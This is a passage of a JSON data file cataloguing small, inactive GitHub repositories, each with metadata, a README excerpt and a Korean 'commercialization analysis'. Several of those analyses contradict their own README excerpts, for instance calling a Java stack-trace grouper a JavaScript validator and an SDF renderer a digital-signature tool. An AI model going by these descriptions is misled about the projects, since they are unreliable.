you!\n","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"nrslib/clarc-laravel-plugin","github_url":"https://github.com/nrslib/clarc-laravel-plugin","stars":5,"language":"PHP","license":"MIT","abandonment_months":79,"description":"# clarc-laravel-plugin 상품화 분석\n\n## 왜 보물인가\n라라벨이라는 인기 있는 웹 개발 도구에 맞춤형 기능을 추가해주는 플러그인으로, 개발자의 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 라라벨 기반 웹앱 플랫폼에 통합하여 고객사에게 추가 기능으로 제공\n2. **내부 업무 도구**: 중소 ","readme_excerpt":"# clarc-laravel-plugin\r\n\r\nクリーンアーキテクチャの実装例にしたがって、必要なモジュール群をスキャフォールディングするプラグインです。\r\n\r\nhttps://nrslib.com/phpcon-2019-proposal/\r\n\r\n現在開発中です。\r\n\r\n# Commands\r\n\r\n## clarc:init\r\n\r\n初期化コマンドです。\r\nClarcProvider と ClarcMiddleWare が作成されます。\r\nClarcProvider を Provider として登録し、ClarcMiddleWare を MiddleWare として登録してください。\r\nClarcProvider は後述の clarc:make 実行時にインジェクション対象を設定する箇所です。\r\n\r\n## clarc:make\r\n\r\nクリーンアーキテクチャの実装例にしたがって、必要なモジュール群をスキャフォールディングします。\r\n入力に従い下記データが生成されます。\r\n\r\n- Controller\r\n- InputData\r\n- InputPort\r\n- Interactor\r\n- OutputPort\r\n- OutputData\r\n- Presenter\r\n- ViewModel\r\n","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"NicolasPereira/web4noobs","github_url":"https://github.com/NicolasPereira/web4noobs","stars":7,"language":"","license":"unknown","abandonment_months":61,"description":"# NicolasPereira/web4noobs 평가\n\n## 왜 보물인가\n초보자도 웹 개발의 기초를 쉽게 배울 수 있는 교육용 자료집으로, 복잡한 웹 개발을 단순하게 설명하는 데 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 초보자 대상 웹 개발 입문 강좌의 보충 자료로 제공\n2. **기업 교육 도구**: 신입사원 온보딩 시","readme_excerpt":"<!-- Title -->\n<h2 align=\"center\">Web4Noobs</h2>\n\n<p align=\"center\">\n  <h1 align=\"center\"><img src=\"./assets/logo.png\" alt=\"Imagem da linguagem\" width=\"120\"></h1>\n</p>    \n <!-- ABOUT THE PROJECT -->\n\n## Sobre o Projeto\nTem como objetivo apresentar os principais conceitos da web para pessoas que estão iniciando na área de desenvolvimento. \nEstes conhecimentos básicos são de extrema importância para que você entenda a forma que a web funciona, desde modo\nfacilitando muito o seu aprendizado em qualquer linguagem web.\n\n<!-- ROADMAP OF PROJECT -->\n\n## ROADMAP\n\n- [O que é a internet - Em Construção](link-primeira-parte)\n  - [Como a internet funciona - Em Construção](link-segunda-parte)\n- [O que é HTTP - Em Construção](link-terceira-parte)\n- [Navegadores, como que eles funcionam - Em Construção](link-quarta-parte)\n- [DNS - Em Construção](link-quinta-parte)\n  - [O que é um DNS - Em Construção](link-sub-conteudo)\n  - [Como funciona um DNS - Em Construção](link-sub-conteudo)\n- [O que é um domin","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"jinmang2/HuggingTemplate","github_url":"https://github.com/jinmang2/HuggingTemplate","stars":5,"language":"Python","license":"unknown","abandonment_months":58,"description":"# HuggingTemplate 저장소 분석\n\n## 왜 보물인가\n인공지능 모델을 쉽게 만들고 관리할 수 있는 기본 틀을 제공하여, 비전문가도 AI 프로젝트를 시작할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 맞춤형 AI 챗봇 구축 플랫폼으로 판매\n2. **내부 업무 도구**: 기업 내 문서 분석, 자동 요약, 이메일","readme_excerpt":"# HuggingTemplate","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"hernanborre/ap-mc2-v2","github_url":"https://github.com/hernanborre/ap-mc2-v2","stars":5,"language":"","license":"unknown","abandonment_months":55,"description":"# hernanborre/ap-mc2-v2 평가 보고서\n\n## 왜 보물인가\n저장소 정보가 매우 제한적이어서 이 프로젝트의 핵심 가치를 파악하기 어렵습니다. 별점 5개와 2021년 마지막 활동만으로는 현재 상태와 상용화 가능성을 판단할 수 없습니다.\n\n## 어디에 쓸 수 있나\n**정보 부족으로 구체적 시나리오 제시 불가능합니다.** 저장소의 README, 코","readme_excerpt":"","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"jojoldu/codesoom-react","github_url":"https://github.com/jojoldu/codesoom-react","stars":6,"language":"","license":"unknown","abandonment_months":54,"description":"# jojoldu/codesoom-react 분석\n\n## 왜 보물인가\nReact를 배우려는 초보자들을 위해 실제 프로젝트를 따라 만들면서 배울 수 있는 학습 교재입니다.\n\n## 어디에 쓸 수 있나\n- **온라인 코딩 강의 플랫폼**: 이 프로젝트를 기반으로 한 구독형 비디오 강의 판매\n- **기업 신입 교육 프로그램**: 개발 회사들이 신입 직원 온보딩 교","readme_excerpt":"# 코드숨 리액트편 \n\n","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"Ovyerus/vexil","github_url":"https://github.com/Ovyerus/vexil","stars":5,"language":"Elixir","license":"MIT","abandonment_months":43,"description":"# Vexil 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자별로 다른 기능을 켜고 끄는 '기능 토글' 시스템으로, 큰 변화 없이 안전하게 새로운 기능을 시험할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 구독 등급별로 다른 기능을 제공하는 클라우드 서비스(예: 기본 사용자는 기본 기능만, 프리미엄 사용자는 모든 기능 ","readme_excerpt":"# Vexil\n\n> An Elixir flag parser that does _just_ enough.\n\nVexil is a CLI flag parsing library for Elixir, intended to be used in places\nwhere you might want to parse user input akin to how command line arguments are\nparsed, but in an area where you aren't getting the input from an actual command\nline, say a website or a chat platform bot.\n\nI found [OptionParser](https://hexdocs.pm/elixir/1.12/OptionParser.html)'s\nsettings to be too confusing for me, and\n[Optimus](https://github.com/funbox/optimus) is intended for use in regular\ncommand line application (with the in-built help and closing the application\nwhen encountering input errors), so Vexil slots in between the two as a sort of\nmiddle ground, letting you control how errors are displayed/handled for the\nuser, and still having a sane interface for defining flags and options.\n\n---\n\nVexil is currently beta-quality software, but is well tested with over 90%\ncoverage at time of writing, including most standard usage scenarios for it.\nUn","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"MateoElias/bot-structure","github_url":"https://github.com/MateoElias/bot-structure","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":55,"description":"# MateoElias/bot-structure 평가\n\n## 왜 보물인가\n프로그램을 자동으로 움직이게 하는 기초 틀을 미리 만들어두어 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **채팅봇 SaaS**: 기업의 고객 상담을 자동으로 처리하는 클라우드 서비스\n2. **내부 업무 도구**: 회사 직원들이 반복 업무를 자동화하도록 돕는","readme_excerpt":"# bot-structure\nMy current Discord Bot Structure\n\n## Requirements:\n\n### Packages\n**[discord.js](https://www.npmjs.com/package/discord.js)** | *1.11 Mb*\n\n[ms](https://www.npmjs.com/package/ms) | *6.72 Kb*\n\n[fastest-levenshtein](https://www.npmjs.com/package/fastest-levenshtein) | *11 Kb*\n\n[chalk](https://www.npmjs.com/package/chalk) | *35 Kb*\n\n\n### Files\n**config.json**\n```json\n{\n  \"TOKEN\": \"YOUR TOKEN\",\n  \"PREFIX\": \"YOUR PREFIX\"\n \n \n //... any additional data you want ...  \n}\n```\n","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"keith-turner/JSG","github_url":"https://github.com/keith-turner/JSG","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":91,"description":"# JSG 저장소 분석\n\n## 왜 보물인가\n자바스크립트 코드를 자동으로 검증하고 최적화하는 도구로, 웹 서비스의 품질을 높이는 데 도움을 줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹사이트 빌더 플랫폼에서 사용자가 작성한 코드 자동 검수 기능\n2. **내부 업무 도구**: 개발팀의 코드 품질 관리 시스템으로 실시간 오류 알림","readme_excerpt":"# JSG : Java Stack Trace Grouper\n\nA simple program that groups jstack threads with the same stack. If you have ever found yourself looking at Java stack traces with many threads having the same stack, then this tool is for you.  The following is some example jstack output.\n\n```\n\"org.eclipse.jdt.internal.ui.text.JavaReconciler\" #401 daemon prio=1 os_prio=0 tid=0x00007fc207743800 nid=0x7e58 in Object.wait() [0x00007fc15e6f5000]\n   java.lang.Thread.State: TIMED_WAITING (on object monitor)\n\tat java.lang.Object.wait(Native Method)\n\tat org.eclipse.jface.text.reconciler.AbstractReconciler$BackgroundThread.run(AbstractReconciler.java:180)\n\t- locked <0x00000000c1800210> (a org.eclipse.jface.text.reconciler.DirtyRegionQueue)\n\n\"org.eclipse.jdt.internal.ui.text.JavaReconciler\" #225 daemon prio=1 os_prio=0 tid=0x00007fc206ebc800 nid=0x78f3 in Object.wait() [0x00007fc15c135000]\n   java.lang.Thread.State: TIMED_WAITING (on object monitor)\n\tat java.lang.Object.wait(Native Method)\n\tat org.eclipse.jface","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"EranBoudjnah/solid","github_url":"https://github.com/EranBoudjnah/solid","stars":6,"language":"Kotlin","license":"MIT","abandonment_months":62,"description":"# SOLID 저장소 분석\n\n## 왜 보물인가\n소프트웨어 설계의 기본 원칙들을 체계적으로 구현한 예제 코드 모음으로, 개발자들이 유지보수하기 쉬운 안정적인 프로그램을 만드는 데 도움을 줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 프로그래밍 학습자들을 위한 온라인 강의나 튜토리얼 서비스로 패키징\n2. **기업 내부 교육 도구","readme_excerpt":"# SOLID Components\n\n[![Version - Application](https://img.shields.io/maven-central/v/com.mitteloupe.solid/solidapplication?label=application+|+MavenCentral)](https://mvnrepository.com/artifact/com.mitteloupe.solid/solidapplication)\n\n[![Version - Activity](https://img.shields.io/maven-central/v/com.mitteloupe.solid/solidactivity?label=activity+|+MavenCentral)](https://mvnrepository.com/artifact/com.mitteloupe.solid/solidactivity)\n[![Version - Fragment](https://img.shields.io/maven-central/v/com.mitteloupe.solid/solidfragment?label=fragment+|+MavenCentral)](https://mvnrepository.com/artifact/com.mitteloupe.solid/solidfragment)\n[![Version - Service](https://img.shields.io/maven-central/v/com.mitteloupe.solid/solidservice?label=service+|+MavenCentral)](https://mvnrepository.com/artifact/com.mitteloupe.solid/solidservice)\n\n[![Version - RecyclerView](https://img.shields.io/maven-central/v/com.mitteloupe.solid/solidrecyclerview?label=recyclerview+|+MavenCentral)](https://mvnrepository.com/art","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"julienstroheker/MS-Hack-A-Doc","github_url":"https://github.com/julienstroheker/MS-Hack-A-Doc","stars":5,"language":"","license":"MIT","abandonment_months":103,"description":"# MS-Hack-A-Doc 분석\n\n## 왜 보물인가\n마이크로소프트 문서를 자동으로 분석하고 정리해주는 도구로, 수작업으로 하던 문서 처리 시간을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 문서 자동 분류 웹 서비스로 제공하여 월 구독료 징수\n2. **내부 업무 도구**: 대기업의 문서 관리팀이 사내 시스","readme_excerpt":"# MS-Hack-A-Doc\nHack-A-Doc links\n\n* [AI](AI/README.md)\n* [Azure](Azure/README.md)\n* [Business Solutions](BusinessSolutions/README.md)\n* [Cloud and Datacenter Management](CloudandDatacenterManagement/README.md)\n* [Data Platform](DataPlatform/README.md)\n* [Enterprise Mobility](EnterpriseMobility/README.md)\n* [Excel](Excel/README.md)\n* [Office](Office/README.md)\n* [Outlook](Outlook/README.md)\n* [PowerPoint](PowerPoint/README.md)\n* [Visio](Visio/README.md)\n* [Visual Studio and Development Technologies](VisualStudioandDevelopmentTechnologies/README.md)\n* [Windows and Devices for IT](WindowsandDevicesforIT/README.md)\n* [Windows Development](WindowsDevelopment/README.md)\n* [Word](Word/README.md)\n\n\n[https://docs.microsoft.com/fr-ca/education/windows/](https://docs.microsoft.com/fr-ca/education/windows/)","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"otiai10/gh-dependents","github_url":"https://github.com/otiai10/gh-dependents","stars":5,"language":"Go","license":"MIT","abandonment_months":26,"description":"# otiai10/gh-dependents 분석\n\n## 왜 보물인가\n깃허브에 올려진 자신의 소프트웨어가 다른 프로젝트에서 얼마나 사용되고 있는지 한눈에 파악할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자들이 자신의 오픈소스 프로젝트의 인기도와 영향력을 모니터링하는 대시보드\n2. **내부 업무 도구**: 회사의 소프트","readme_excerpt":"# gh-dependents\n\n[![Actions Status](https://github.com/otiai10/gh-dependents/workflows/Go/badge.svg)](https://github.com/otiai10/gh-dependents/actions)\n[![Web Test](https://github.com/otiai10/gh-dependents/actions/workflows/webtest.yaml/badge.svg)](https://github.com/otiai10/gh-dependents/actions/workflows/webtest.yaml)\n[![codecov](https://codecov.io/gh/otiai10/gh-dependents/branch/main/graph/badge.svg)](https://codecov.io/gh/otiai10/gh-dependents)\n\n`gh` command extension to see dependents of your repository.\n\n![screenshot](https://raw.githubusercontent.com/otiai10/gh-dependents/main/screenshot.png)\n\nSee The GitHub Blog: [GitHub CLI 2.0 includes extensions!](https://github.blog/2021-08-24-github-cli-2-0-includes-extensions/)\n\n# Install\n\n```sh\ngh extension install otiai10/gh-dependents\n```\n\n# Usage\n\n```sh\ngh dependents otiai10/lookpath\n# gh dependents {user}/{repo}\n```\n\n# Advanced Usage\n\n```sh\ngh dependents \\\n    -v \\                     # Show verbose log\n    -page=2 \\                #","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"shametha/Flutter-Calculator","github_url":"https://github.com/shametha/Flutter-Calculator","stars":5,"language":"Makefile","license":"unknown","abandonment_months":54,"description":"# Flutter Calculator 분석 보고서\n\n## 왜 보물인가\n스마트폰에서 바로 쓸 수 있는 계산기 앱으로, 누구나 필요로 하는 기본 기능을 갖춘 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **계산기 앱 SaaS**: 광고 기반 무료 계산기 앱을 구글플레이/앱스토어에서 유료 프리미엄 버전으로 판매\n2. **금융사 내부 도구**: 은행이나 ","readme_excerpt":"# Calculator\n\nA mathematical Calculator using Flutter.\n","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"ggoodman/ts-statemachine","github_url":"https://github.com/ggoodman/ts-statemachine","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":76,"description":"# ggoodman/ts-statemachine 평가\n\n## 왜 보물인가\n복잡한 업무 흐름을 자동으로 관리해주는 기술로, 금융·게임·주문 처리 같은 여러 단계가 있는 시스템에서 실수를 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 주문 시스템이 결제→배송→배달 완료 단계를 자동으로 추적하고 관리하는 서비스\n2. **내","readme_excerpt":"# ts-statemachine\n\nA typed statemachine.\n\n## Documentation\n\nSee the [API Documentation](https://ggoodman.github.io/ts-statemachine/).\n\n## Example\n\n```ts\n// Define possible events\nenum Events {\n  Start = 'Start',\n  Stop = 'Stop',\n}\n\n// Define possible states\nenum States {\n  Idle = 'Idle',\n  Started = 'Started',\n  Alarming = 'Alarming',\n  Stopped = 'Stopped',\n}\n\n// Define the set of valid transitions\nconst transitions: StateMachineTransitions<States, Events> = {\n  [States.Idle]: {\n    on: {\n      // When in the Idle state, the Start Event will transition to the Started state if\n      // the ignition check succeeds, otherwise the next action will run and the state\n      // machine will instead transition to the Alarming state.\n      [Events.Start]: [\n        {\n          // Only transition to the started state if the optional condition function\n          // returns true\n          condition() {\n            return checkIgnitionKey();\n          },\n          target: States.Started,\n        },\n","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"RuSaG0/levenshtein-js","github_url":"https://github.com/RuSaG0/levenshtein-js","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":54,"description":"# RuSaG0/levenshtein-js 분석\n\n## 왜 보물인가\n두 단어나 문장이 얼마나 비슷한지 자동으로 판단해주는 기술로, 검색창의 오타 수정이나 중복 데이터 찾기 같은 실무에서 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **검색 플랫폼**: 이커머스 검색창에서 \"아이폰\" 검색 시 \"아이폰\" 오타도 제대로 찾아주는 기능\n2. **고객 관리 시","readme_excerpt":"# levenshtein-js\n\n## Usage\n\n### Steps: \n```\nlevenshteinDistance({a: 'fish', b: 'fosh'}).steps // {1}\nlevenshteinDistance({a: 'fish', b: 'Fish'}).steps // {1} case sensitive\n```\n### relative & similarity\n```\nlevenshteinDistance({a:'github', b: 'gethub'}); \n/* {\n    relative: 0.16666666666666666, \n    similarity: 0.8333333333333334, \n    steps: 1 \n} */\n```\n\n## Try to take best from all js impls\n\nhttps://github.com/gustf/js-levenshtein\nThe only one impl algorithm that has fn Big O notation of work less than O (n2) (also known as fast levenshtein). This can be improved by adding the maximum distance after which it makes no sense to go through the matrix.\n\nhttps://github.com/tad-lispy/node-damerau-levenshtein\nHas scoring model(relative, similarity), I use it\n\n## New:\n### maxDistance model\nOptional parameter. I recommend using it ONLY if there is a strong need for optimization. It slightly increases speed, but noticeably decreases accuracy (relative/similarity).In most cases don't use!\n```\nl","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"bharathsudharsan/Optimized-One-vs-One-Algorithm","github_url":"https://github.com/bharathsudharsan/Optimized-One-vs-One-Algorithm","stars":5,"language":"C","license":"MIT","abandonment_months":47,"description":"# Optimized-One-vs-One-Algorithm 분석\n\n## 왜 보물인가\n복잡한 분류 문제를 빠르고 효율적으로 푸는 알고리즘으로, 은행 사기 탐지나 의료 진단처럼 정확성이 중요한 분야에서 비용과 시간을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 은행이나 핀테크 회사에 사기 거래 탐지 시스템으로 월 구","readme_excerpt":"# Training up to 50 Class ML Models on Arduino MCUs and Real-time Inference \n\nIn this repo, we provide the code of Opt-OVO, which is an optimized (resource-friendly) version of the popular One-vs-One algorithm to enable high-performance multi-class ML classifier training and inference directly on microcontroller units (MCUs). We evaluate Opt-OVO by performing live ML model training on 4 popular MCU boards using datasets of varying class counts, sizes and feature dimensions.  \n\n**Exciting Finding:** On the  3 $ ESP32, Opt-OVO trained a multi-class ML classifier using a dataset of class count 50 and performed unit inference in super real-time of 6.2 ms.\n\n## Table of Contents\n\n  * [Opt-OVO Algorithm](#opt-ovo-algorithm)\n  * [Datasets, MCU Boards for Training and Inference on MCUs](#datasets--mcu-boards-for-training-and-inference-on-mcus)\n    + [Datasets](#datasets)\n    + [MCU Boards](#mcu-boards)\n  * [Opt-OVO Performance Evaluation](#opt-ovo-performance-evaluation)\n    + [Procedure](#proc","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"ezhivitsa/redis-gui","github_url":"https://github.com/ezhivitsa/redis-gui","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":39,"description":"# Redis-GUI 상업화 분석\n\n## 왜 보물인가\n복잡한 데이터베이스를 마우스 클릭으로 관리할 수 있는 관리 도구로, 기술자가 아닌 일반 직원도 데이터를 쉽게 다룰 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 관리가 필요한 웹 애플리케이션(배송 추적, 예약 시스템 등)에 내장하여 고객 데이터 조회 기능 제공\n- ","readme_excerpt":"# Redis GUI\n\n[![license](https://img.shields.io/github/license/mashape/apistatus.svg?style=flat-square)](LICENSE)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com)\n\n[![Watch on GitHub](https://img.shields.io/github/watchers/ezhivitsa/redis-gui.svg?style=social&label=Watch)](https://github.com/ezhivitsa/redis-gui/watchers)\n[![Star on GitHub](https://img.shields.io/github/stars/ezhivitsa/redis-gui.svg?style=social&label=Stars)](https://github.com/ezhivitsa/redis-gui/stargazers)\n\nRedis GUI is based on the following technologies:\n\n- electron\n- react\n- mobx\n- ioredis\n- webpack\n- postcss\n\n### Functionality\n\n1. Create/edit/delete direct, cluster or sentinel connections to Redis\n2. Setting ssh and tls settings for connections\n3. Viewing prefixes and keys in tree structure\n4. Creating new keys and editing or deleting existing key values\n\n### Screenshots\n\n<table>\n  <tr>\n    <td>\n      <img src=\"./assets/screenshots/1.png\" al","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"opensourcerails-org/site","github_url":"https://github.com/opensourcerails-org/site","stars":5,"language":"Ruby","license":"unknown","abandonment_months":26,"description":"# opensourcerails-org/site 분석\n\n## 왜 보물인가\n오픈소스 소프트웨어 프로젝트들을 한곳에 모아 검색하고 비교할 수 있는 플랫폼으로, 개발자들이 필요한 도구를 쉽게 찾을 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업의 개발팀이 월 구독으로 이용하는 '오픈소스 프로젝트 추천 및 검증 플랫폼'\n2. ","readme_excerpt":"# OpenSourceRails.org\n\nA directory of open-source Ruby on Rails apps that [joshmn](/joshmn) thinks are worth talking about for some reason or another.\n\nHave one to suggest? [Click here](https://github.com/opensourcerails-org/suggestions/issues/new).\n\n## Setup\n\n* Clone the repo\n* `bin/setup`\n\n## Quirks and features\n\nThere's a lot of cleaning up that could be done, but in my mad-dash of a weekend project, it's pretty okay.\n\n## Production requirements\n\nAs of this blame, production hums along nicely at ~800MB of RAM due to a lot of in-memory caching. Assume 2GB to be safe.\n\n## Todos\n\nProbably test.\n\n## Other reading material\n\n* See [VERBIAGE.md](VERBIAGE.md) for what things mean (or try to mean)\n* See [OPERATING.md](OPERATING.md) for the disaster recovery plan (e.g. I die)\n","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"markusmoenig/Signed","github_url":"https://github.com/markusmoenig/Signed","stars":5,"language":"Swift","license":"GPL-3.0","abandonment_months":31,"description":"# Signed 저장소 분석\n\n## 왜 보물인가\n디지털 문서나 데이터에 법적 효력을 갖는 서명을 추가할 수 있는 기술로, 계약서·인증·검증이 필요한 모든 온라인 거래의 신뢰성을 보장합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 전자계약 플랫폼 (부동산 거래, 금융 계약서 서명)\n2. **내부 업무 도구**: 기업 문서 결재 시스템 (전자","readme_excerpt":"A visual SDF modeler and renderer for macOS and iPadOS.","composite_score":0.5001,"license_safety_tag":"restricted"},{"name":"ukyo/zlib-wasm-without-emscripten-sample","github_url":"https://github.com/ukyo/zlib-wasm-without-emscripten-sample","stars":5,"language":"C","license":"MIT","abandonment_months":44,"description":"# ukyo/zlib-wasm-without-emscripten-sample 분석\n\n## 왜 보물인가\n웹 브라우저에서 파일을 압축·해제할 수 있게 해주는 기술로, 사용자 컴퓨터에서 직접 처리되어 개인정보 보호와 속도 모두를 확보할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 파일 저장소 SaaS**\n- 사용자가 브라우저에서 파일을 압축한 뒤","readme_excerpt":"# zlib-wasm-without-emscripten-sample\n\nA zlib WebAssembly binary build sample with [dcodeIO/webassembly](https://github.com/dcodeIO/webassembly).\n\n## Initialize and Build code\n\n```\n$ git clone https://github.com/ukyo/zlib-wasm-without-emscripten-sample.git\n$ cd zlib-wasm-without-emsripten-sample\n$ npm install\n$ npm run build\n``` \n\n## Example\n\n```js\nconst myZlib = await require(\"./src/index\").initialize();\nconst deflated = myZlib.deflate(buffer);\nconsole.log(myZlib.inflate(deflated).equals(buffer));\n```\n\n## Benchmark\n\n* NodeJS: v8.9.1\n* OS: MacBook Pro\n* CPU: Intel Core i5 2.4GHz \n* Memory: 16GB\n\n```\n$ npm run bench\n\n## lorem_1mb.txt size: 1000205\nwasm x 9.61 ops/sec ±4.48% (27 runs sampled)\npako x 8.70 ops/sec ±2.26% (25 runs sampled)\nnative x 15.21 ops/sec ±3.15% (41 runs sampled)\nDeflate: Fastest is native\n## deflated lorem_1mb.txt size: 257012\nwasm x 120 ops/sec ±10.26% (60 runs sampled)\npako x 106 ops/sec ±8.56% (67 runs sampled)\nnative x 211 ops/sec ±2.68% (74 runs sampled)\nInflat","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"bccfilkom/designsystem","github_url":"https://github.com/bccfilkom/designsystem","stars":7,"language":"TypeScript","license":"unknown","abandonment_months":58,"description":"# bccfilkom/designsystem 분석 보고서\n\n## 왜 보물인가\n회사나 앱의 화면 디자인을 일관되게 유지하기 위한 '디자인 규칙서'로, 반복적인 디자인 작업을 빠르게 처리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대규모 웹 서비스 제공 업체가 고객사별 맞춤형 디자인 시스템 구축 서비스 제공\n2. **내부 업","readme_excerpt":"<b><h1 align=\"center\">🤖 BCC - Design System</h1></b>\n<p align=\"center\">Design System is a set of components that have been standardized by a guideline to reduce redundancy and make all components consistent both in language and visually.</p>\n\n\n## Installation\nBCC-Design System is available at [npmjs: @bccfilkom/designsystem](https://www.npmjs.com/package/@bccfilkom/designsystem)\n\n```bash\n# with NPM\nnpm install @bccfilkom/designsystem\n\n# with YARN\nyarn add @bccfilkom/designsystem\n```\n\n## Documentation\nCheck out our [official documentation website](https://designsystem.bccfilkom.net/)\n\n## Usage\nThis is a quick example of using BCC - Design System component\n\n```jsx\nimport * as React from 'react';\nimport ReactDOM from 'react-dom';\nimport {Button} from '@bccfilkom/designsystem';\n\n\nfunction App() {\n  return (\n    <Button onClick={() => console.log(\"Hello world\")}>Hello World</Button>\n  );\n}\n\nReactDOM.render(<App />, document.querySelector('#app'));\n```\n\n\n## Contributing\n\nPlease read our [Con","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"hcode-game-square/hcode-game-square.github.io","github_url":"https://github.com/hcode-game-square/hcode-game-square.github.io","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":61,"description":"# hcode-game-square 분석 보고서\n\n## 왜 보물인가\n웹 기반 게임 플랫폼으로, 코딩 없이 누구나 게임을 즐기고 공유할 수 있는 온라인 커뮤니티 서비스입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 학교/학원의 게임 기반 학습 플랫폼으로 월 구독 제공\n2. **내부 업무 도구**: 기업 팀빌딩용 온라인 미니게임 대회 시스템 ","readme_excerpt":"","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"MousamSingh2612/MySQLwithPython","github_url":"https://github.com/MousamSingh2612/MySQLwithPython","stars":5,"language":"Python","license":"unknown","abandonment_months":55,"description":"# MySQLwithPython 저장소 분석\n\n## 왜 보물인가\n엑셀이나 종이에서 관리하던 데이터를 전문적인 데이터베이스 시스템으로 자동 관리할 수 있게 도와주는 기초 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객사의 판매 기록, 재고, 거래 정보를 클라우드에서 관리하는 웹 서비스\n- **내부 업무 도구**: 중소기업의 직원 정보","readme_excerpt":"# MySQL with Python\n\n- Implementing basic MySQL CRUD (Create, Read, Update, Delete) queries, using Python.\n- We can connect to a MySQL database hosted locally by using the package/module named; \n  `mysql-connector-python`.\n\n### mysql-connector-python module.\n- MySQL Connector/Python enables Python programs to access MySQL databases, using an API that is compliant with the Python Database API Specification.\n- It is written in pure Python and does not have any dependencies except for the Python Standard Library.\n- It provies a class called `cursor.MySQLCursor`. By using the various methods of this class, we can write and execute MySQL queries directly in Python IDE.\n\n## Code output:\n\n###  Creating Database and Tables:\n\n![Screenshot (89)](https://user-images.githubusercontent.com/81910954/144259582-f8530978-fbc9-481f-a7df-005c09198a2a.png)\n=======================================================================================================================================================","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"LXSMNSYC/solid-emoji-picker","github_url":"https://github.com/LXSMNSYC/solid-emoji-picker","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":26,"description":"# solid-emoji-picker 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자가 쉽게 이모지(😀🎉 같은 그림 문자)를 선택할 수 있도록 해주는 도구로, 모든 디지털 서비스에서 필수적으로 필요한 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **메시징 앱 SaaS**: 채팅 서비스나 협업 도구에 내장하여 사용자들이 감정 표현을 풍부하게 할 수 ","readme_excerpt":"# solid-emoji-picker\n\n> Unstyled Emoji Picker component for SolidJS\n\n[![NPM](https://img.shields.io/npm/v/solid-emoji-picker.svg)](https://www.npmjs.com/package/solid-emoji-picker) [![JavaScript Style Guide](https://badgen.net/badge/code%20style/airbnb/ff5a5f?icon=airbnb)](https://github.com/airbnb/javascript) [![Open in CodeSandbox](https://img.shields.io/badge/Open%20in-CodeSandbox-blue?style=flat-square&logo=codesandbox)](https://codesandbox.io/s/github/LXSMNSYC/solid-emoji-picker/tree/main/examples/demo)\n\n## Install\n\n```bash\nnpm i solid-emoji-picker\n```\n\n```bash\nyarn add solid-emoji-picker\n```\n\n```bash\npnpm add solid-emoji-picker\n```\n\n## Usage\n\n### Simplest example\n\n```jsx\nimport { EmojiPicker } from 'solid-emoji-picker';\n\nfunction App() {\n  function pickEmoji(emoji) {\n    console.log('You clicked', emoji.name);\n  }\n\n  return (\n    <EmojiPicker onEmojiClick={pickEmoji} />\n  );\n}\n```\n\n### Emoji Data\n\nThe emoji data is based on [`unicode-emoji-json`](https://github.com/muan/unicode-e","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"elizarov/AdventOfCode2021","github_url":"https://github.com/elizarov/AdventOfCode2021","stars":5,"language":"Kotlin","license":"unknown","abandonment_months":54,"description":"# AdventOfCode2021 상품화 분석\n\n## 왜 보물인가\n매년 전 세계 수만 명이 